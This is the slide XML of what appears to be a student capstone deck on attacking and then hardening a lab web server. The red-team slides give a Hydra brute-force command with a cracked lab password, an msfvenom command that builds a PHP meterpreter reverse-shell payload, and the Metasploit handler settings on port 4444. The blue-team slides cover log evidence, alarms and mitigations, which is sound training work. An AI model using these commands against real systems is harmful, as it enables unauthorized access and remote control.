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IBM Plex Mono Medium"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
      <p:italic r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin"/>
      <p:regular r:id="rId36"/>
      <p:bold r:id="rId37"/>
      <p:italic r:id="rId38"/>
      <p:boldItalic r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold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Medium"/>
      <p:regular r:id="rId46"/>
      <p:bold r:id="rId47"/>
      <p:italic r:id="rId48"/>
      <p:boldItalic r:id="rId49"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="IBM Plex Mono SemiBold"/>
      <p:regular r:id="rId50"/>
      <p:bold r:id="rId51"/>
      <p:italic r:id="rId52"/>
      <p:boldItalic r:id="rId53"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>
      <p:regular r:id="rId54"/>
      <p:bold r:id="rId55"/>
      <p:italic r:id="rId56"/>
      <p:boldItalic r:id="rId57"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="IBM Plex Mono"/>
      <p:regular r:id="rId58"/>
      <p:bold r:id="rId59"/>
      <p:italic r:id="rId60"/>
      <p:boldItalic r:id="rId61"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="IBM Plex Sans SemiBol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3FD520-882D-4015-BD74-B15740F83241}">
  <a:tblStyle styleId="{573FD520-882D-4015-BD74-B15740F8324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6FE31D7-AA23-41C0-9505-2F6B24413C6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Black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Medium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edium-italic.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId49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IBMPlexMonoMedium-bold.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexMonoMedium-regular.fntdata"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexMonoMedium-boldItalic.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexMonoMedium-italic.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-bold.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-regular.fntdata"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular.fntdata"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexMono-boldItalic.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemi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IBMPlexSansSemiBol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IBMPlexMon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MonoSemiBold-bold.fntdata"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexMonoSemiBold-regular.fntdata"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexMonoSemiBold-boldItalic.fntdata"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexMonoSemiBold-italic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59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexMono-bold.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexMon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Anyone have a better quality image on this slide? No worries if not.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2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" name="Google Shape;40;p5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1" name="Google Shape;51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1" name="Google Shape;61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4" name="Google Shape;64;p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" name="Google Shape;71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1" name="Google Shape;81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3" name="Google Shape;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277850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Capstone Engagement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solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assessment, Analysis, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and Hardening of a Vulnerable System</a:t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 sz="3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 sz="34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9" name="Google Shape;1019;p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0" y="-4159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Exploitation:WebDav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used Metasploit to exploit WebDav and generated a shell.php meterpreter payload using msfvenom. The payload was uploaded to the site to open a meterpreter session. The compromises machine initiated the connection while the kali box remained open listening for connections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was able to navigate to the secret directory and find the flag.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start listening on port 4444 and open reverse shell via meterpreter (Metasploit console’s multi/handler exploit):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exploit/multi/handler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payload php/meterpreter/reverse_tcp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LHOST 192.168.1.105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LPORT 4444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exploit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Exploitation:CVE-2012-1823 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3" name="Google Shape;1153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4" name="Google Shape;1154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Tools &amp; Processes</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="14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The first thing is to find this exploit by running sudo arp-scan –l, and an nmap scan of the network. After finding the weakness then I used msfconsole and meterpreter (metasploit) and set a payload and gave it a direction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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1156" name="Google Shape;1156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7" name="Google Shape;1157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8" name="Google Shape;1158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0" name="Google Shape;116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Achievements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 was able to open a TCP reverse shell</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1164" name="Google Shape;1164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5" name="Google Shape;116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6" name="Google Shape;116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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6411449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Command Used</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000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create payload php file using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msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt;&gt;shell.php</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00000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65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9649" l="0" r="0" t="9658"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289900"/>
            <a:ext cx="8595294" cy="459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Blue Team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IBM Plex Mono"/>
                <a:ea typeface="IBM Plex Mono"/>
                <a:cs typeface="IBM Plex Mono"/>
                <a:sym typeface="IBM Plex Mono"/>
              </a:rPr>
              <a:t>Log Analysis and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3400"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" sz="3400">
                <a:latin typeface="IBM Plex Mono"/>
                <a:ea typeface="IBM Plex Mono"/>
                <a:cs typeface="IBM Plex Mono"/>
                <a:sym typeface="IBM Plex Mono"/>
              </a:rPr>
              <a:t>Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr sz="34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75" name="Google Shape;1175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Evidence of Attack in Logs</a:t>
            </a:r>
            <a:endParaRPr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81" name="Google Shape;118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182" name="Google Shape;1182;p66"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="1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{E6FE31D7-AA23-41C0-9505-2F6B24413C6E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3619500"/>
                <a:gridCol w="3619500"/>
              </a:tblGrid>
              <a:tr h="42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/>
                        <a:t>Attack Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600" u="none" cap="none" strike="noStrike"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/>
                        <a:t>Evidence</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600" u="none" cap="none" strike="noStrike"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91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="5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Brute Force Attack</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" cap="none" strike="noStrike"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Large volume of failed HTTP requests from Mozilla (Hydra)</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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51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Reverse PHP Shell</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" cap="none" strike="noStrike"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Port 4444 activity and traffic to url path /webdav/shell.php</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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42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2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occurred on 8/13/2020 at 00:00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33,522 hits were done on the system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1191" name="Google Shape;11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 rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="25954" l="0" r="0" t="16898"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="586050" y="1973437"/>
            <a:ext cx="7971900" cy="150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99" name="Google Shape;119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36 requests were made to the /webdav directory.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shell.php was requested.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1201" name="Google Shape;120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138" y="1366740"/>
            <a:ext cx="7333725" cy="33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8" name="Google Shape;1208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9" name="Google Shape;120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0" name="Google Shape;1210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12" name="Google Shape;12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9" y="0"/>
            <a:ext cx="9019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20" name="Google Shape;1220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70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23" name="Google Shape;12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238125"/>
            <a:ext cx="83058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71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9649" l="0" r="0" t="9658"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289900"/>
            <a:ext cx="8595294" cy="459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Blue Team</a:t>
            </a:r>
            <a:endParaRPr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IBM Plex Mono"/>
                <a:ea typeface="IBM Plex Mono"/>
                <a:cs typeface="IBM Plex Mono"/>
                <a:sym typeface="IBM Plex Mono"/>
              </a:rPr>
              <a:t>Monitoring and Alarms and Mitigation</a:t>
            </a:r>
            <a:endParaRPr sz="34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31" name="Google Shape;1231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37" name="Google Shape;1237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8" name="Google Shape;1238;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1239700" y="1382175"/>
            <a:ext cx="42717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Failed Login Attempts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Traffic to Sensitive Folders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user_agent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Ports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IP Addresses</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239" name="Google Shape;1239;p72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206775" y="45175"/>
            <a:ext cx="3429900" cy="7401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Table of Contents</a:t>
            </a:r>
            <a:endParaRPr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7" name="Google Shape;1027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8" name="Google Shape;102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9" name="Google Shape;1039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40" name="Google Shape;1040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Red Team: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Security Assessment</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1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Blue Team:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1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Hardening: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Proposed Monitoring and Alarms</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="10345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5" name="Google Shape;124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6" name="Google Shape;1246;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-370700" y="1602450"/>
            <a:ext cx="49953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Monitor reverse TCP shell using default ports 4444 etc. and rarely used ports, then email SOC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Wireshark alert to monitor beacon and email SOC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of alerts for this company should set to 1x attempt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7" name="Google Shape;1247;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4354500" y="1447175"/>
            <a:ext cx="48573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Setup configuration on firewall to block file upload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Setup software to block any uploads outside of company network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 access to a list of approved IP address (whitelist)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Multi-Factor Authentication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Restrict all file load activity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Internal audits to ensure that sensitive data/information is not on the website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3" name="Google Shape;125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4" name="Google Shape;1254;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223227" y="1470831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/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Set alert searches for a query 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        seconds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85750" lvl="0" marL="5746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100 ports/second base on the machine size and a given specific ip address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5" name="Google Shape;125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mitigate port scans?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="5746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Turn off port range access to unused or rarely used ports</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="5746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Allow only certain IP’s with secure access to ports eg SSH port 22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/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="6302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Change firewall configurations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61" name="Google Shape;1261;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="278645" y="5526251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2" name="Google Shape;1262;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195518" y="1493864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/>
          </a:p>
          <a:p>
            <a:pPr indent="-285749" lvl="0" marL="5127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Set alarm for attempted access of file not in User Group permission</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285749" lvl="0" marL="5127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Set alarm for attempted access       10x/second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  10x attempted access/second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63" name="Google Shape;1263;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4396936" y="1442604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/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="4016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Create group directory permission,  allowing only certain groups to access hidden directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="4016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Stricter username and password encryption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/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="3460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Chmod 740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http://192.168.1.105/company_folder/secret_folder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9" name="Google Shape;1269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0" name="Google Shape;1270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/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="7413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If someone attempts a high number of logins per minute, send an email to the SOC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-285750" lvl="0" marL="8032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I would set a threshold of 10 logins per minute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1" name="Google Shape;1271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/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="7413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" sz="1400"/>
              <a:t>Set it to lock user out  for  a set  amount of time after so many incorrect logins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        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/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="74136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" sz="1400"/>
              <a:t>This is a module you have to install but it allows you to lock the user out for a set amount of time after a set amount of failed attempts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77" name="Google Shape;127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8" name="Google Shape;1278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/>
              <a:t>Set alarm for an unauthorized user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        trying to access the password file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400"/>
              <a:t>Anytime an unauthorized user tries to access the file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9" name="Google Shape;1279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/>
              <a:t>Use chmod to make sure only the right groups are available to modify that file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400"/>
              <a:t>Set file access to chmod 744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1400"/>
              <a:t>WebDav should be re-examine and possibly lock it down or institute stronger security measures to potentially decommission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6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9805" l="0" r="0" t="9814"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289900"/>
            <a:ext cx="8595285" cy="459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50" y="2127450"/>
            <a:ext cx="8595300" cy="8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Network Topology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 sz="34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192.168.1.1/24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 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 Hyper-V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Network Topology</a:t>
            </a:r>
            <a:endParaRPr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00" y="763800"/>
            <a:ext cx="481526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 rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="23275" l="0" r="0" t="23280"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289900"/>
            <a:ext cx="8595292" cy="4593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Red Team</a:t>
            </a:r>
            <a:endParaRPr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Security Assessment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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr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1700">
                <a:latin typeface="IBM Plex Mono"/>
                <a:ea typeface="IBM Plex Mono"/>
                <a:cs typeface="IBM Plex Mono"/>
                <a:sym typeface="IBM Plex Mono"/>
              </a:rPr>
              <a:t>Nmap identified the following hosts on 192.168.1.1 / 24</a:t>
            </a:r>
            <a:endParaRPr sz="1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{573FD520-882D-4015-BD74-B15740F83241}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Hostname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IP Address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Role on Network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Hyper-V Manager</a:t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192.168.1.1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Terminal Services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Kali</a:t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192.168.1.90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Attacking Machine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Capstone</a:t>
                      </a:r>
                      <a:endParaRPr sz="160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192.168.1.105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Victim Machine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Sans SemiBold"/>
                        <a:ea typeface="IBM Plex Sans SemiBold"/>
                        <a:cs typeface="IBM Plex Sans SemiBold"/>
                        <a:sym typeface="IBM Plex Sans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Sans SemiBold"/>
                          <a:ea typeface="IBM Plex Sans SemiBold"/>
                          <a:cs typeface="IBM Plex Sans SemiBold"/>
                          <a:sym typeface="IBM Plex Sans SemiBold"/>
                        </a:rPr>
                        <a:t>ELK</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600" u="none" cap="none" strike="noStrike">
                        <a:latin typeface="IBM Plex Sans SemiBold"/>
                        <a:ea typeface="IBM Plex Sans SemiBold"/>
                        <a:cs typeface="IBM Plex Sans SemiBold"/>
                        <a:sym typeface="IBM Plex Sans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192.168.1.100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Monitoring Machine</a:t>
                      </a:r>
                      <a:endParaRPr sz="160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0" y="31517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Vulnerability Assessment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12300" y="707492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>
                <a:latin typeface="IBM Plex Mono"/>
                <a:ea typeface="IBM Plex Mono"/>
                <a:cs typeface="IBM Plex Mono"/>
                <a:sym typeface="IBM Plex Mono"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr sz="13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364847" y="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96824" y="1072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{573FD520-882D-4015-BD74-B15740F83241}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1805850"/>
                <a:gridCol w="3263800"/>
                <a:gridCol w="2638275"/>
              </a:tblGrid>
              <a:tr h="35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IBM Plex Mono Medium"/>
                          <a:ea typeface="IBM Plex Mono Medium"/>
                          <a:cs typeface="IBM Plex Mono Medium"/>
                          <a:sym typeface="IBM Plex Mono Medium"/>
                        </a:rPr>
                        <a:t>Vulnerability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IBM Plex Mono Medium"/>
                          <a:ea typeface="IBM Plex Mono Medium"/>
                          <a:cs typeface="IBM Plex Mono Medium"/>
                          <a:sym typeface="IBM Plex Mono Medium"/>
                        </a:rPr>
                        <a:t>Description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IBM Plex Mono Medium"/>
                          <a:ea typeface="IBM Plex Mono Medium"/>
                          <a:cs typeface="IBM Plex Mono Medium"/>
                          <a:sym typeface="IBM Plex Mono Medium"/>
                        </a:rPr>
                        <a:t>Impact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IBM Plex Mono Medium"/>
                        <a:ea typeface="IBM Plex Mono Medium"/>
                        <a:cs typeface="IBM Plex Mono Medium"/>
                        <a:sym typeface="IBM Plex Mono Medium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32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Human Element</a:t>
                      </a:r>
                      <a:endParaRPr sz="105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Human element puts information important </a:t>
                      </a:r>
                      <a:b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</a:b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to the hacker in public domains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Allows the hacker </a:t>
                      </a:r>
                      <a:b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</a:b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to obtain important information used </a:t>
                      </a:r>
                      <a:b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</a:b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to hack into a system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Brute Force (hydra)</a:t>
                      </a:r>
                      <a:endParaRPr sz="105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Brute force attack method that’s hydra to find the password protecting sensitive files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Sensitive files protected by the password can be obtained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 SemiBold"/>
                          <a:ea typeface="IBM Plex Mono SemiBold"/>
                          <a:cs typeface="IBM Plex Mono SemiBold"/>
                          <a:sym typeface="IBM Plex Mono SemiBold"/>
                        </a:rPr>
                        <a:t>WebDav</a:t>
                      </a:r>
                      <a:endParaRPr sz="1050" u="none" cap="none" strike="noStrike">
                        <a:latin typeface="IBM Plex Mono SemiBold"/>
                        <a:ea typeface="IBM Plex Mono SemiBold"/>
                        <a:cs typeface="IBM Plex Mono SemiBold"/>
                        <a:sym typeface="IBM Plex Mono SemiBold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LFI (local file include) allows access into confidential files on a site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An LFI vulnerability allows attackers to gain access to sensitive credentials</a:t>
                      </a:r>
                      <a:endParaRPr sz="1050" u="none" cap="none" strike="noStrike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CVE-2012-1823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a basic reverse TCP shell through meterpreter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attacker to gain basic command line and find out what commands they can run</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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Human factor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reading information listed on the company web site and where sensitive files were able to be found.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help us to know what users there are and where to start to start looking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cookies in the system  to search for sensitive information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0" y="-4159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(hydra)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was used for brute forcing passwords into Ashton’s account. Ashton’s password was Leopoldo. After accessing the account, we found a hash and used John the Ripper to get the linux4u password for Ryan’s account.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used Hydra to brute force the password for the account since we already know the username . We were successful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use hydra to bruteforce a password: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Hydra-l ashton –P rockyou.txt –s 80 –f –vV 192.168.1.105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